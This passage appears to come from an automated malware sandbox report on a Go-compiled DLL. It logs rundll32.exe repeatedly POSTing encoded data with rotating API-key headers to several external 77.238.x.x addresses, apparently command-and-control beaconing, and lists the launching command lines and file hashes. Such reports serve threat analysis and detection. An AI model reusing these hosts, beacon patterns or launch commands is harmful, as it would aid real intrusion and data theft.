    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Gs61QEee
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    67192.168.2.54978377.238.224.56806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:37.139714003 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 6kahKGxy
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    68192.168.2.54978477.238.229.63806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:38.752332926 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: VyCvTDYq
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    69192.168.2.54978577.238.250.123806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:40.381884098 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: lyFi7mBW
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:53:41.195003033 CEST165INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:53:41 GMT
    Content-Length: 1
    Data Raw: 0a
    Data Ascii:


    Click to jump to process

    Click to jump to process

    • File
    • Network

    Click to dive into process behavior distribution

    Target ID:0
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\System32\loaddll32.exe
    Wow64 process (32bit):true
    Commandline:loaddll32.exe "C:\Users\user\Desktop\file.dll"
    Imagebase:0xd10000
    File size:126'464 bytes
    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:3
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
    Imagebase:0x790000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:4
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",#1
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Target ID:5
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Target ID:6
    Start time:06:50:53
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Target ID:7
    Start time:06:50:59
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Target ID:8
    Start time:06:50:59
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    No disassembly